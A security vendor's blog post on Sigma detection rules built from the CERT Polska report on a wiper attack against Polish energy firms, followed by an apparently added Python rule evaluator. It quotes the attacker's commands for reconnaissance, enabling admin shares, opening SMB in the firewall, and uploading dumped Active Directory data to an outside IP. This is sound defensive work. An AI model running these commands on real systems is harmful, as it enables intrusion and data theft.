
Detection improvements based on Russian APT Attacks on Energy Sector in Poland


On 29 December 2025 a destructive wiper attack was carried out against the energy sector in Poland.

This included companies operating:

  • Wind and solar farms
  • Manufacturing plants
  • Heat and power plants

CERT Polska released a report on its investigation on 30 January [1], and our security analysts studied the report to understand the attack methodology and identify opportunities to improve our detection capabilities for similar attacks.


Based on the insights gained from the report, new Sigma rules were created, published in the official SamurAI Sigma Rules Repository and deployed in NTT's hunting engine.

The following sections walk through the attack in more depth and describe the Sigma rules that were created.


Entry vector

CERT Polska reports that in each incident the entry vector was a FortiGate device exposing VPN access without enforced two-factor authentication. Additionally, some of the devices had previously been running vulnerable versions, which may have facilitated initial access.


Figure 1: Example of an exposed FortiGate login window

Wiper deployments

The attacks utilized a varied toolset, which included uploading corrupted firmware versions to Hitachi Remote Terminal Units (RTUs), causing device reboot loops.


Figure 2: Image snippet from the CERT Polska report comparing the legitimate firmware (left) with the corrupted firmware deployed by the attacker (right)
Figure 3: Image of a Hitachi RTU560 from the Hitachi Energy website [2]

Besides deploying corrupted firmware, the attacker also executed wiper malware designed to corrupt Windows machines.


Strengthening defense against the attack

The attacks were detected thanks to EDR deployments within the affected organization, and it is our security analysts' assessment that similar attacks against our customer base would be detected and defended against where a combination of EDR solutions and network logging is deployed.


However, based on the intelligence in the report, the following additional Sigma detection rules were created to strengthen our defenses further:


  • NirCmd savescreenshot execution (NTT-990833990)
  • Multiple lolbins executed from cmd.exe (NTT-822258637)
  • Powershell New-ItemProperty Enable Administrative Shares (NTT-130524096)
  • Powershell New-NetFirewallRule Suspicious Locally Allowed Port (NTT-487769391)
  • Powershell Invoke-RestMethod File Upload (NTT-4205756490)

All of the rules are available on the SamurAI Sigma Rules Repository [3].


The following subsections describe the attacker activity each rule is designed to detect.


NirCmd used during reconnaissance

The attacker used PsExec to execute the Windows command-line tool NirCmd and take screenshots throughout the environment:

nircmd.exe "savescreenshot C:\Windows\Temp\imagetmp.png"

Our security analysts created the following Sigma rule to detect usage of NirCmd's savescreenshot feature:


title: NirCmd savescreenshot execution
description: Execution of NirCmd screenshot feature observed in OT intrusions by Russian APT groups
references:
  - https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf
  - https://www.nirsoft.net/utils/nircmd.html
status: stable
date: 2026-02-04
modified: 2026-02-04
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    image|endswith:
      - \nircmd.exe
    command|contains: savescreenshot
  condition: selection
falsepositives:
  - Legitimate usage of NirCmd
level: medium

Lolbins execution to fetch system information

The attackers also executed multiple lolbins to gather system information:

cmd.exe /c "tasklist > C:\Windows\TEMP\outlog.txt && netstat -nao >> C:\Windows\TEMP\outlog.txt && netstat -r >> C:\Windows\TEMP\outlog.txt && arp -a >> C:\Windows\TEMP\outlog.txt && dir /s /b C:\Users >> C:\Windows\TEMP\outlog.txt"

Our security analysts created a Sigma rule to detect execution of multiple lolbins from a single cmd.exe command:

title: Multiple lolbins executed from cmd.exe
description: 'Execution of tasklist and at least one more lolbin, all executed from the same cmd.exe command with a piped result. This behavior was observed in the Russian APT attack on Polish OT-Infrastructure'
references:
- https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf
status: stable
date: 2026-02-11
modified: 2026-02-11
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    image|endswith: \cmd.exe
    command|contains|all:
      - '/c'
      - '>>'
      - '&&'
  tool_tasklist:
    command|contains: tasklist
  tool_netstat:
    command|contains: netstat
  tool_arp:
    command|contains: "arp "
  tool_dir:
    command|contains: "dir "
  condition: selection and tool_tasklist and (tool_netstat or tool_arp or tool_dir)
falsepositives:
  - Legitimate execution of tools
level: medium

Enabling administrative shares

The following PowerShell commands were executed to enable administrative shares in preparation for lateral movement:

New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -Name 'AutoShareWks' -Value 1 -PropertyType DWord -Force
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -Name 'AutoShareServer' -Value 1 -PropertyType DWord -Force

The following Sigma rule was implemented to detect the activity:

title: Powershell New-ItemProperty Enable Administrative Shares
description: Usage of New-ItemProperty to enable administrative shares. This behavior was observed in the Russian APT attack on Polish OT-Infrastructure.
references:
- https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty
status: stable
date: 2026-02-12
modified: 2026-02-12
logsource:
  product: windows
  category: ps_script
detection:
  selection:
    script_block|contains|all:
    - New-ItemProperty
    - HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
    - -Value 1
    script_block|contains:
    - AutoShareWks
    - AutoShareServer
  condition: selection
falsepositives:
- Legitimate administrative activity
level: medium

Adding Windows Firewall Rule

The following PowerShell command was executed to allow inbound SMB traffic (TCP port 445) in preparation for lateral movement:

New-NetFirewallRule -Name 'Microsoft Update' -DisplayName 'Microsoft Update' -Protocol TCP -LocalPort 445 -Action Allow

The following Sigma rule was implemented to detect similar additions of suspicious firewall rules:


title: Powershell New-NetFirewallRule Suspicious Locally Allowed Port
id: 337134fa-b455-470c-a345-a29d93399da3
description: Usage of New-NetFirewallRule to create local firewall opening for suspicious port. This behavior was observed in the Russian APT attack on Polish OT-Infrastructure.
references:
- https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf
- https://learn.microsoft.com/en-us/powershell/module/netsecurity/new-netfirewallrule
status: stable
author: Axel Olsson
date: 2026-02-12
modified: 2026-02-12
logsource:
  product: windows
  category: ps_script
detection:
  selection_1:
    script_block|contains|all:
    - New-NetFirewallRule
    - -Name
    - -DisplayName
    - -LocalPort
    - Allow
  selection_2:
    script_block|contains:
    - '445'
    - '3389'
  condition: selection_1 and selection_2
falsepositives:
- Legitimate Firewall Rule
level: medium

Exfiltrating Active Directory database and registry hives to an external IP

The following PowerShell command was executed to exfiltrate the dumped Active Directory database and registry hives to an external attacker-controlled IP:


Invoke-RestMethod -Uri http://31.172.71[.]5:50443 -Method Post -InFile .\kkk.zip

The following Sigma rule was implemented to detect the activity:


title: Powershell Invoke-RestMethod File Upload
description: Usage of Invoke-RestMethod to upload a file. This behavior was observed
  in the Russian APT attack on Polish OT-Infrastructure.
references:
- https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod
status: stable
date: 2026-02-12
modified: 2026-02-12
logsource:
  product: windows
  category: ps_script
detection:
  selection:
    script_block|contains|all:
    - Invoke-RestMethod
    - -Uri http
    - -Method Post
    - -InFile
  condition: selection
falsepositives:
- Legitimate use of Invoke-RestMethod
level: medium
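To check that the five rules above fire on the quoted command lines and stay quiet on ordinary activity, here is an added example (not code from this post nor from the SamurAI repository) of a small evaluator for the subset of Sigma semantics these rules use: the endswith, contains and contains|all modifiers and conditions built from selection names, and/or/not and parentheses. The field names image, command and script_block follow the rules as written on the page; the RULES dictionary transcribes their detection sections, and the EVENTS list is constructed test data, with the RFC 5737 documentation address 203.0.113.10 standing in for the real exfiltration IP.

```python
"""Tiny evaluator for the Sigma detection sections quoted on this page: the
modifiers endswith / contains / contains|all and conditions made of selection
names, and/or/not and parentheses. Rules and events below are constructed for
this example (field names follow the rules as written on the page)."""
import re


def field_matches(value, modifiers, patterns):
    """Apply a Sigma modifier chain to one field, case-insensitively."""
    pats = [str(p).lower() for p in ([patterns] if isinstance(patterns, str) else patterns)]
    value = str(value).lower()
    if "endswith" in modifiers:
        hits = [value.endswith(p) for p in pats]
    elif "contains" in modifiers:
        hits = [p in value for p in pats]
    else:
        hits = [value == p for p in pats]                    # no modifier: exact match
    return all(hits) if "all" in modifiers else any(hits)   # a list is OR-ed unless |all


def selection_matches(event, selection):
    """Every 'field|modifier|...' entry of a selection must match the event."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if field not in event or not field_matches(event[field], modifiers, patterns):
            return False
    return True


def evaluate(rule, event):
    """Evaluate rule['detection'] against one event; True means a hit."""
    detection = rule["detection"]
    results = {n: selection_matches(event, s) for n, s in detection.items() if n != "condition"}

    def substitute(m):
        word = m.group(0)
        if word in ("and", "or", "not"):
            return word
        if word not in results:
            raise ValueError(f"condition references unknown selection {word!r}")
        return str(results[word])

    expr = re.sub(r"[A-Za-z_]\w*", substitute, detection["condition"])
    if not re.fullmatch(r"[A-Za-z()\s]*", expr):   # only True/False, keywords, parens remain
        raise ValueError(f"unsupported condition syntax: {detection['condition']!r}")
    return bool(eval(expr, {"__builtins__": {}}, {}))


# Detection sections transcribed from the five rules on this page.
RULES = {
    "NirCmd savescreenshot execution": {"detection": {
        "selection": {"image|endswith": ["\\nircmd.exe"], "command|contains": "savescreenshot"},
        "condition": "selection"}},
    "Multiple lolbins executed from cmd.exe": {"detection": {
        "selection": {"image|endswith": "\\cmd.exe", "command|contains|all": ["/c", ">>", "&&"]},
        "tool_tasklist": {"command|contains": "tasklist"},
        "tool_netstat": {"command|contains": "netstat"},
        "tool_arp": {"command|contains": "arp "},
        "tool_dir": {"command|contains": "dir "},
        "condition": "selection and tool_tasklist and (tool_netstat or tool_arp or tool_dir)"}},
    "Powershell New-ItemProperty Enable Administrative Shares": {"detection": {
        "selection": {"script_block|contains|all": ["New-ItemProperty",
                      "HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters", "-Value 1"],
                      "script_block|contains": ["AutoShareWks", "AutoShareServer"]},
        "condition": "selection"}},
    "Powershell New-NetFirewallRule Suspicious Locally Allowed Port": {"detection": {
        "selection_1": {"script_block|contains|all":
                        ["New-NetFirewallRule", "-Name", "-DisplayName", "-LocalPort", "Allow"]},
        "selection_2": {"script_block|contains": ["445", "3389"]},
        "condition": "selection_1 and selection_2"}},
    "Powershell Invoke-RestMethod File Upload": {"detection": {
        "selection": {"script_block|contains|all":
                      ["Invoke-RestMethod", "-Uri http", "-Method Post", "-InFile"]},
        "condition": "selection"}},
}

# Constructed events: the command lines quoted in the post plus two benign ones.
# 203.0.113.10 is an RFC 5737 documentation address, not the real exfiltration IP.
EVENTS = [
    {"image": "C:\\Windows\\Temp\\nircmd.exe",
     "command": 'nircmd.exe "savescreenshot C:\\Windows\\Temp\\imagetmp.png"'},
    {"image": "C:\\Windows\\System32\\cmd.exe",
     "command": 'cmd.exe /c "tasklist > C:\\Windows\\TEMP\\outlog.txt && netstat -nao '
                '>> C:\\Windows\\TEMP\\outlog.txt && arp -a >> C:\\Windows\\TEMP\\outlog.txt"'},
    {"image": "C:\\Windows\\System32\\cmd.exe",
     "command": 'cmd.exe /c "tasklist > C:\\Temp\\procs.txt"'},      # benign: one tool, no chaining
    {"script_block": "New-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer"
                     "\\Parameters' -Name 'AutoShareWks' -Value 1 -PropertyType DWord -Force"},
    {"script_block": "New-NetFirewallRule -Name 'Microsoft Update' -DisplayName 'Microsoft Update' "
                     "-Protocol TCP -LocalPort 445 -Action Allow"},
    {"script_block": "Invoke-RestMethod -Uri http://203.0.113.10:50443 -Method Post -InFile .\\kkk.zip"},
    {"script_block": "Invoke-RestMethod -Uri https://status.example.test/api -Method Get"},  # benign GET
]


def run(rules=RULES, events=EVENTS):
    """Return {rule title: [indexes of events that hit]}; events lacking a field never match."""
    return {title: [i for i, ev in enumerate(events) if evaluate(rule, ev)]
            for title, rule in rules.items()}
```

Calling run() yields exactly one hit per rule (events 0, 1, 3, 4 and 5) and no hits on the two benign events. The matching is substring-based, as in the rules themselves, so selection_2 of the firewall rule also fires on a port such as 4450 or on a DisplayName that happens to contain those digits; if that proves noisy in a given environment, restricting the match to the value following -LocalPort is the natural tuning step.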

References
